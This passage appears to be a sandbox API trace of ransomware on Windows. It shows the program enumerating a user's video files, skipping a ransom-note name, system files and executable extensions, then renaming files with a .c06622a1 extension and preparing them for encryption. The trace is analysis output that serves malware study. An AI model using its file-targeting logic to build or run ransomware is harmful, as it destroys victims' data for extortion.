"c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg")) returned 0x10 [0168.485] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.485] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" [0168.485] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned 0x36 [0168.485] wcscpy (in: _Dest=0x32400ce, _Source="6rmODmx20qDNcI94tlWL.avi" | out: _Dest="6rmODmx20qDNcI94tlWL.avi") returned="6rmODmx20qDNcI94tlWL.avi" [0168.485] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\6rmODmx20qDNcI94tlWL.avi", dwFileAttributes=0x80) returned 1 [0168.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\6rmODmx20qDNcI94tlWL.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\6rmodmx20qdnci94tlwl.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0168.486] SetFilePointerEx (in: hFile=0x1c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.486] ReadFile (in: hFile=0x1c, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.486] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x8aedc24d [0168.487] RtlComputeCrc32 (PartialCrc=0xc24d, Buffer=0x32e9a4, Length=0x80) returned 0x427067fd [0168.487] RtlComputeCrc32 (PartialCrc=0x67fd, Buffer=0x32e9a4, Length=0x80) returned 0x5d34382a [0168.487] RtlComputeCrc32 (PartialCrc=0x382a, Buffer=0x32e9a4, Length=0x80) returned 0x8cf3f478 [0168.487] RtlComputeCrc32 (PartialCrc=0xf478, Buffer=0x32e9a4, Length=0x80) returned 0x68cf0301 [0168.487] CloseHandle (hObject=0x1c) returned 1 [0168.487] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.487] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\6rmODmx20qDNcI94tlWL.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\6rmODmx20qDNcI94tlWL.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\6rmODmx20qDNcI94tlWL.avi" [0168.487] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\6rmODmx20qDNcI94tlWL.avi") returned 0x4f [0168.487] wcscpy (in: _Dest=0x3250106, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.487] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\6rmODmx20qDNcI94tlWL.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\6rmodmx20qdnci94tlwl.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\6rmODmx20qDNcI94tlWL.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\6rmodmx20qdnci94tlwl.avi.c06622a1"), dwFlags=0x8) returned 1 [0168.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\6rmODmx20qDNcI94tlWL.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\6rmodmx20qdnci94tlwl.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c [0168.490] CreateIoCompletionPort (FileHandle=0x1c, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0168.490] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3cb0020 [0168.500] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4ac2960 [0168.500] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4a273221 [0168.500] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50b73e4 [0168.500] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x43dd8365 [0168.500] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1d9f1f3 [0168.500] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3a6cc2a0 [0168.500] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4383266 [0168.500] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x65aa4582 [0168.503] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3cb0094, Length=0x80) returned 0x213c0fb7 [0168.503] RtlComputeCrc32 (PartialCrc=0xfb7, Buffer=0x3cb0094, Length=0x80) returned 0x192177ea [0168.504] RtlComputeCrc32 (PartialCrc=0x77ea, Buffer=0x3cb0094, Length=0x80) returned 0xbf5a45e6 [0168.504] RtlComputeCrc32 (PartialCrc=0x45e6, Buffer=0x3cb0094, Length=0x80) returned 0x5a8d0dc5 [0168.504] RtlComputeCrc32 (PartialCrc=0xdc5, Buffer=0x3cb0094, Length=0x80) returned 0xc8b5893f [0168.504] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3cb0020) returned 1 [0168.504] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.504] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.504] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c67fb0, ftCreationTime.dwHighDateTime=0x1d5e5f5, ftLastAccessTime.dwLowDateTime=0x3c05efe0, ftLastAccessTime.dwHighDateTime=0x1d5dd4d, ftLastWriteTime.dwLowDateTime=0x3c05efe0, ftLastWriteTime.dwHighDateTime=0x1d5dd4d, nFileSizeHigh=0x0, nFileSizeLow=0xd9d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="8cBrE.flv", cAlternateFileName="")) returned 1 [0168.504] _wcsicmp (_Str1="8cBrE.flv", _Str2="README.c06622a1.TXT") returned -58 [0168.504] wcsstr (_Str="8cBrE.flv", _SubStr="README") returned 0x0 [0168.504] _wcsicmp (_Str1="autorun.inf", _Str2="8cBrE.flv") returned 41 [0168.504] wcslen (_String="autorun.inf") returned 0xb [0168.504] _wcsicmp (_Str1="boot.ini", _Str2="8cBrE.flv") returned 42 [0168.504] wcslen (_String="boot.ini") returned 0x8 [0168.504] _wcsicmp (_Str1="bootfont.bin", _Str2="8cBrE.flv") returned 42 [0168.504] wcslen (_String="bootfont.bin") returned 0xc [0168.504] _wcsicmp (_Str1="bootsect.bak", _Str2="8cBrE.flv") returned 42 [0168.504] wcslen (_String="bootsect.bak") returned 0xc [0168.504] _wcsicmp (_Str1="desktop.ini", _Str2="8cBrE.flv") returned 44 [0168.504] wcslen (_String="desktop.ini") returned 0xb [0168.504] _wcsicmp (_Str1="iconcache.db", _Str2="8cBrE.flv") returned 49 [0168.504] wcslen (_String="iconcache.db") returned 0xc [0168.504] _wcsicmp (_Str1="ntldr", _Str2="8cBrE.flv") returned 54 [0168.504] wcslen (_String="ntldr") returned 0x5 [0168.504] _wcsicmp (_Str1="ntuser.dat", _Str2="8cBrE.flv") returned 54 [0168.505] wcslen (_String="ntuser.dat") returned 0xa [0168.505] _wcsicmp (_Str1="ntuser.dat.log", _Str2="8cBrE.flv") returned 54 [0168.505] wcslen (_String="ntuser.dat.log") returned 0xe [0168.505] _wcsicmp (_Str1="ntuser.ini", _Str2="8cBrE.flv") returned 54 [0168.505] wcslen (_String="ntuser.ini") returned 0xa [0168.505] _wcsicmp (_Str1="thumbs.db", _Str2="8cBrE.flv") returned 60 [0168.505] wcslen (_String="thumbs.db") returned 0x9 [0168.505] _wcsicmp (_Str1="386", _Str2="flv") returned -51 [0168.505] wcslen (_String="386") returned 0x3 [0168.505] _wcsicmp (_Str1="adv", _Str2="flv") returned -5 [0168.505] wcslen (_String="adv") returned 0x3 [0168.505] _wcsicmp (_Str1="ani", _Str2="flv") returned -5 [0168.505] wcslen (_String="ani") returned 0x3 [0168.505] _wcsicmp (_Str1="bat", _Str2="flv") returned -4 [0168.505] wcslen (_String="bat") returned 0x3 [0168.505] _wcsicmp (_Str1="bin", _Str2="flv") returned -4 [0168.505] wcslen (_String="bin") returned 0x3 [0168.505] _wcsicmp (_Str1="cab", _Str2="flv") returned -3 [0168.505] wcslen (_String="cab") returned 0x3 [0168.505] _wcsicmp (_Str1="cmd", _Str2="flv") returned -3 [0168.505] wcslen (_String="cmd") returned 0x3 [0168.505] _wcsicmp (_Str1="com", _Str2="flv") returned -3 [0168.505] wcslen (_String="com") returned 0x3 [0168.505] _wcsicmp (_Str1="cpl", _Str2="flv") returned -3 [0168.505] wcslen (_String="cpl") returned 0x3 [0168.505] _wcsicmp (_Str1="cur", _Str2="flv") returned -3 [0168.505] wcslen (_String="cur") returned 0x3 [0168.505] _wcsicmp (_Str1="deskthemepack", _Str2="flv") returned -2 [0168.506] wcslen (_String="deskthemepack") returned 0xd [0168.506] _wcsicmp (_Str1="diagcab", _Str2="flv") returned -2 [0168.506] wcslen (_String="diagcab") returned 0x7 [0168.506] _wcsicmp (_Str1="diagcfg", _Str2="flv") returned -2 [0168.506] wcslen (_String="diagcfg") returned 0x7 [0168.506] _wcsicmp (_Str1="diagpkg", _Str2="flv") returned -2 [0168.506] wcslen (_String="diagpkg") returned 0x7 [0168.506] _wcsicmp (_Str1="dll", _Str2="flv") returned -2 [0168.506] wcslen (_String="dll") returned 0x3 [0168.506] _wcsicmp (_Str1="drv", _Str2="flv") returned -2 [0168.506] wcslen (_String="drv") returned 0x3 [0168.506] _wcsicmp (_Str1="exe", _Str2="flv") returned -1 [0168.506] wcslen (_String="exe") returned 0x3 [0168.506] _wcsicmp (_Str1="hlp", _Str2="flv") returned 2 [0168.506] wcslen (_String="hlp") returned 0x3 [0168.506] _wcsicmp (_Str1="icl", _Str2="flv") returned 3 [0168.506] wcslen (_String="icl") returned 0x3 [0168.506] _wcsicmp (_Str1="icns", _Str2="flv") returned 3 [0168.506] wcslen (_String="icns") returned 0x4 [0168.506] _wcsicmp (_Str1="ico", _Str2="flv") returned 3 [0168.506] wcslen (_String="ico") returned 0x3 [0168.506] _wcsicmp (_Str1="ics", _Str2="flv") returned 3 [0168.506] wcslen (_String="ics") returned 0x3 [0168.506] _wcsicmp (_Str1="idx", _Str2="flv") returned 3 [0168.506] wcslen (_String="idx") returned 0x3 [0168.506] _wcsicmp (_Str1="ldf", _Str2="flv") returned 6 [0168.506] wcslen (_String="ldf") returned 0x3 [0168.506] _wcsicmp (_Str1="lnk", _Str2="flv") returned 6 [0168.507] wcslen (_String="lnk") returned 0x3 [0168.507] _wcsicmp (_Str1="mod", _Str2="flv") returned 7 [0168.507] wcslen (_String="mod") returned 0x3 [0168.507] _wcsicmp (_Str1="mpa", _Str2="flv") returned 7 [0168.507] wcslen (_String="mpa") returned 0x3 [0168.507] _wcsicmp (_Str1="msc", _Str2="flv") returned 7 [0168.507] wcslen (_String="msc") returned 0x3 [0168.507] _wcsicmp (_Str1="msp", _Str2="flv") returned 7 [0168.507] wcslen (_String="msp") returned 0x3 [0168.507] _wcsicmp (_Str1="msstyles", _Str2="flv") returned 7 [0168.507] wcslen (_String="msstyles") returned 0x8 [0168.507] _wcsicmp (_Str1="msu", _Str2="flv") returned 7 [0168.507] wcslen (_String="msu") returned 0x3 [0168.507] _wcsicmp (_Str1="nls", _Str2="flv") returned 8 [0168.507] wcslen (_String="nls") returned 0x3 [0168.507] _wcsicmp (_Str1="nomedia", _Str2="flv") returned 8 [0168.507] wcslen (_String="nomedia") returned 0x7 [0168.507] _wcsicmp (_Str1="ocx", _Str2="flv") returned 9 [0168.507] wcslen (_String="ocx") returned 0x3 [0168.507] _wcsicmp (_Str1="prf", _Str2="flv") returned 10 [0168.507] wcslen (_String="prf") returned 0x3 [0168.507] _wcsicmp (_Str1="ps1", _Str2="flv") returned 10 [0168.507] wcslen (_String="ps1") returned 0x3 [0168.507] _wcsicmp (_Str1="rom", _Str2="flv") returned 12 [0168.507] wcslen (_String="rom") returned 0x3 [0168.507] _wcsicmp (_Str1="rtp", _Str2="flv") returned 12 [0168.507] wcslen (_String="rtp") returned 0x3 [0168.507] _wcsicmp (_Str1="scr", _Str2="flv") returned 13 [0168.508] wcslen (_String="scr") returned 0x3 [0168.508] _wcsicmp (_Str1="shs", _Str2="flv") returned 13 [0168.508] wcslen (_String="shs") returned 0x3 [0168.508] _wcsicmp (_Str1="spl", _Str2="flv") returned 13 [0168.508] wcslen (_String="spl") returned 0x3 [0168.508] _wcsicmp (_Str1="sys", _Str2="flv") returned 13 [0168.508] wcslen (_String="sys") returned 0x3 [0168.508] _wcsicmp (_Str1="theme", _Str2="flv") returned 14 [0168.508] wcslen (_String="theme") returned 0x5 [0168.508] _wcsicmp (_Str1="themepack", _Str2="flv") returned 14 [0168.508] wcslen (_String="themepack") returned 0x9 [0168.508] _wcsicmp (_Str1="wpx", _Str2="flv") returned 17 [0168.508] wcslen (_String="wpx") returned 0x3 [0168.508] _wcsicmp (_Str1="lock", _Str2="flv") returned 6 [0168.508] wcslen (_String="lock") returned 0x4 [0168.508] _wcsicmp (_Str1="key", _Str2="flv") returned 5 [0168.508] wcslen (_String="key") returned 0x3 [0168.508] _wcsicmp (_Str1="hta", _Str2="flv") returned 2 [0168.508] wcslen (_String="hta") returned 0x3 [0168.508] _wcsicmp (_Str1="msi", _Str2="flv") returned 7 [0168.508] wcslen (_String="msi") returned 0x3 [0168.508] _wcsicmp (_Str1="pdb", _Str2="flv") returned 10 [0168.508] wcslen (_String="pdb") returned 0x3 [0168.508] _wcsicmp (_Str1="sqlite", _Str2="flv") returned 13 [0168.508] wcslen (_String="sqlite") returned 0x6 [0168.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg")) returned 0x10 [0168.509] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.509] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" [0168.509] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned 0x36 [0168.509] wcscpy (in: _Dest=0x32400ce, _Source="8cBrE.flv" | out: _Dest="8cBrE.flv") returned="8cBrE.flv" [0168.509] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\8cBrE.flv", dwFileAttributes=0x80) returned 1 [0168.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\8cBrE.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\8cbre.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0168.509] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.509] ReadFile (in: hFile=0x1ac, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.510] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x20c47795 [0168.510] RtlComputeCrc32 (PartialCrc=0x7795, Buffer=0x32e9a4, Length=0x80) returned 0x98f1803c [0168.510] RtlComputeCrc32 (PartialCrc=0x803c, Buffer=0x32e9a4, Length=0x80) returned 0xa42166c8 [0168.510] RtlComputeCrc32 (PartialCrc=0x66c8, Buffer=0x32e9a4, Length=0x80) returned 0x7726a5c6 [0168.510] RtlComputeCrc32 (PartialCrc=0xa5c6, Buffer=0x32e9a4, Length=0x80) returned 0xe9206ff8 [0168.510] CloseHandle (hObject=0x1ac) returned 1 [0168.510] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.510] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\8cBrE.flv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\8cBrE.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\8cBrE.flv" [0168.510] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\8cBrE.flv") returned 0x40 [0168.510] wcscpy (in: _Dest=0x32500e8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.510] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\8cBrE.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\8cbre.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\8cBrE.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\8cbre.flv.c06622a1"), dwFlags=0x8) returned 1 [0168.513] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\8cBrE.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\8cbre.flv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ac [0168.513] CreateIoCompletionPort (FileHandle=0x1ac, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0168.513] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3d40020 [0168.520] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x969ad0c [0168.520] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x55f341a [0168.521] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2d82d61b [0168.521] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x700d618e [0168.521] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xdfce0be [0168.521] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x571fcd1e [0168.521] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x11572ca [0168.521] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xa1559b4 [0168.524] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3d40094, Length=0x80) returned 0x58147890 [0168.524] RtlComputeCrc32 (PartialCrc=0x7890, Buffer=0x3d40094, Length=0x80) returned 0xe779a0a5 [0168.524] RtlComputeCrc32 (PartialCrc=0xa0a5, Buffer=0x3d40094, Length=0x80) returned 0x8e821e9a [0168.524] RtlComputeCrc32 (PartialCrc=0x1e9a, Buffer=0x3d40094, Length=0x80) returned 0x8938de50 [0168.524] RtlComputeCrc32 (PartialCrc=0xde50, Buffer=0x3d40094, Length=0x80) returned 0xda667a00 [0168.524] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3d40020) returned 1 [0168.524] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.524] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.524] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x126070c0, ftCreationTime.dwHighDateTime=0x1d5dfe6, ftLastAccessTime.dwLowDateTime=0xd6c4b8c0, ftLastAccessTime.dwHighDateTime=0x1d5db79, ftLastWriteTime.dwLowDateTime=0xd6c4b8c0, ftLastWriteTime.dwHighDateTime=0x1d5db79, nFileSizeHigh=0x0, nFileSizeLow=0x16d28, dwReserved0=0x0, dwReserved1=0x0, cFileName="DAbKQ3xFcbi.swf", cAlternateFileName="DABKQ3~1.SWF")) returned 1 [0168.524] _wcsicmp (_Str1="DAbKQ3xFcbi.swf", _Str2="README.c06622a1.TXT") returned -14 [0168.524] wcsstr (_Str="DAbKQ3xFcbi.swf", _SubStr="README") returned 0x0 [0168.524] _wcsicmp (_Str1="autorun.inf", _Str2="DAbKQ3xFcbi.swf") returned -3 [0168.524] wcslen (_String="autorun.inf") returned 0xb [0168.524] _wcsicmp (_Str1="boot.ini", _Str2="DAbKQ3xFcbi.swf") returned -2 [0168.524] wcslen (_String="boot.ini") returned 0x8 [0168.524] _wcsicmp (_Str1="bootfont.bin", _Str2="DAbKQ3xFcbi.swf") returned -2 [0168.524] wcslen (_String="bootfont.bin") returned 0xc [0168.524] _wcsicmp (_Str1="bootsect.bak", _Str2="DAbKQ3xFcbi.swf") returned -2 [0168.524] wcslen (_String="bootsect.bak") returned 0xc [0168.525] _wcsicmp (_Str1="desktop.ini", _Str2="DAbKQ3xFcbi.swf") returned 4 [0168.525] wcslen (_String="desktop.ini") returned 0xb [0168.525] _wcsicmp (_Str1="iconcache.db", _Str2="DAbKQ3xFcbi.swf") returned 5 [0168.525] wcslen (_String="iconcache.db") returned 0xc [0168.525] _wcsicmp (_Str1="ntldr", _Str2="DAbKQ3xFcbi.swf") returned 10 [0168.525] wcslen (_String="ntldr") returned 0x5 [0168.525] _wcsicmp (_Str1="ntuser.dat", _Str2="DAbKQ3xFcbi.swf") returned 10 [0168.525] wcslen (_String="ntuser.dat") returned 0xa [0168.525] _wcsicmp (_Str1="ntuser.dat.log", _Str2="DAbKQ3xFcbi.swf") returned 10 [0168.525] wcslen (_String="ntuser.dat.log") returned 0xe [0168.525] _wcsicmp (_Str1="ntuser.ini", _Str2="DAbKQ3xFcbi.swf") returned 10 [0168.525] wcslen (_String="ntuser.ini") returned 0xa [0168.525] _wcsicmp (_Str1="thumbs.db", _Str2="DAbKQ3xFcbi.swf") returned 16 [0168.525] wcslen (_String="thumbs.db") returned 0x9 [0168.525] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0168.525] wcslen (_String="386") returned 0x3 [0168.525] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0168.525] wcslen (_String="adv") returned 0x3 [0168.525] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0168.525] wcslen (_String="ani") returned 0x3 [0168.525] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0168.525] wcslen (_String="bat") returned 0x3 [0168.525] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0168.525] wcslen (_String="bin") returned 0x3 [0168.525] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0168.525] wcslen (_String="cab") returned 0x3 [0168.525] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0168.525] wcslen (_String="cmd") returned 0x3 [0168.525] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0168.526] wcslen (_String="com") returned 0x3 [0168.526] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0168.526] wcslen (_String="cpl") returned 0x3 [0168.526] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0168.526] wcslen (_String="cur") returned 0x3 [0168.526] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0168.526] wcslen (_String="deskthemepack") returned 0xd [0168.526] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0168.526] wcslen (_String="diagcab") returned 0x7 [0168.526] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0168.526] wcslen (_String="diagcfg") returned 0x7 [0168.526] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0168.526] wcslen (_String="diagpkg") returned 0x7 [0168.526] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0168.526] wcslen (_String="dll") returned 0x3 [0168.526] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0168.526] wcslen (_String="drv") returned 0x3 [0168.526] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0168.526] wcslen (_String="exe") returned 0x3 [0168.526] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0168.526] wcslen (_String="hlp") returned 0x3 [0168.526] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0168.526] wcslen (_String="icl") returned 0x3 [0168.526] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0168.526] wcslen (_String="icns") returned 0x4 [0168.526] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0168.526] wcslen (_String="ico") returned 0x3 [0168.526] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0168.526] wcslen (_String="ics") returned 0x3 [0168.526] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0168.527] wcslen (_String="idx") returned 0x3 [0168.527] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0168.527] wcslen (_String="ldf") returned 0x3 [0168.527] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0168.527] wcslen (_String="lnk") returned 0x3 [0168.527] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0168.527] wcslen (_String="mod") returned 0x3 [0168.527] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0168.527] wcslen (_String="mpa") returned 0x3 [0168.527] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0168.527] wcslen (_String="msc") returned 0x3 [0168.527] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0168.527] wcslen (_String="msp") returned 0x3 [0168.527] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0168.527] wcslen (_String="msstyles") returned 0x8 [0168.527] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0168.527] wcslen (_String="msu") returned 0x3 [0168.527] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0168.527] wcslen (_String="nls") returned 0x3 [0168.527] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0168.527] wcslen (_String="nomedia") returned 0x7 [0168.527] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0168.527] wcslen (_String="ocx") returned 0x3 [0168.527] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0168.527] wcslen (_String="prf") returned 0x3 [0168.527] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0168.527] wcslen (_String="ps1") returned 0x3 [0168.528] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0168.528] wcslen (_String="rom") returned 0x3 [0168.528] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0168.528] wcslen (_String="rtp") returned 0x3 [0168.528] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0168.528] wcslen 